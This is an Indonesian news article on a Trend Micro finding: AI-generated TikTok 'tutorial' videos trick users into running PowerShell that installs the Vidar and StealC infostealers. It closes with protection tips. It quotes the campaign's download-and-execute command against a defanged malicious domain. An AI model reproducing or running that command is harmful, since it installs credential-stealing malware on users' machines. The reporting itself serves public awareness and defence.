Perusahaan keamanan siber Trend Micro mengungkap kampanye terbaru penyebaran malware melalui video TikTok yang dikemas sebagai tutorial "edukasi".
Video-video tersebut menggunakan AI-generated content (suara dan visual) untuk meniru format tutorial resmi, seperti aktivasi Windows, Microsoft Office, Spotify, atau CapCut.
Alih-alih memberikan panduan valid, video tersebut menginstruksikan korban menjalankan perintah PowerShell berbahaya yang mengunduh malware Vidar dan StealC.
Salah satu video teridentifikasi telah ditonton 500.000 kali dan mendapat 20.000 likes, menunjukkan tingginya potensi korban.
Akun penyebar malware seperti @gitallowed dan @digitaldreams771 kini telah dinonaktifkan oleh TikTok 1218.
Modus Operandi: Social Engineering Canggih
Berbeda dari metode lama yang menyematkan tautan di deskripsi, pelaku memanfaatkan verbal instruction dalam video untuk menghindari deteksi algoritma keamanan.
Berikut tahapan penipuan:
- Pengguna diinstruksikan menekan Windows + R dan memasukkan perintah iex (irm hxxps://allaivo[.]me/spotify) via PowerShell.
- Perintah tersebut mengunduh skrip jahat yang menciptakan folder tersembunyi di AppData/LocalAppData dan menonaktifkan Windows Defender.
- Malware Vidar/StealC terinstal, mencuri data sensitif seperti: Password dan info login, Data kartu kredit, Cookie browser, Informasi dompet kripto dan Kode autentikasi dua faktor (2FA).
Dampak dan Kerentanan Pengguna
Vidar dan StealC termasuk infostealers yang mampu mengambil tangkapan layar, merekam aktivitas perangkat, dan mengirim data ke server pelaku via platform seperti Steam dan Telegram.
Serangan ini sulit dideteksi karena korban secara sukarela menjalankan perintah, bukan mengunduh file mencurigakan.
TikTok menjadi sasaran empuk karena algoritmanya yang mendorong konten viral dalam waktu singkat.
Langkah Proteksi Darurat
Tim keamanan merekomendasikan:
- Jangan jalankan perintah PowerShell/Random dari video tutorial tanpa verifikasi sumber.
- Hindari tawaran "aktivasi gratis" perangkat lunak berbayar di platform sosial.
- Gunakan antivirus dengan fitur behavioral analysis untuk memantau eksekusi PowerShell mencurigakan.
- Perbarui semua kredensial jika terlanjur menjalankan instruksi video mencurigakan.
Pernyataan TikTok Terkait Malware TikTok Berkedok Video Tutorial
Akun terkait telah diblokir, dan pengguna dapat melaporkan konten scam melalui TikTok Safety Center.
Sumber:
- Trend Micro Research - TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC.
- Infosecurity Magazine - AI-Generated TikTok Videos Used to Distribute Infostealer Malware.
- TechTimes - TikTok Malware Alert: AI-Generated Scam Videos Target Users.
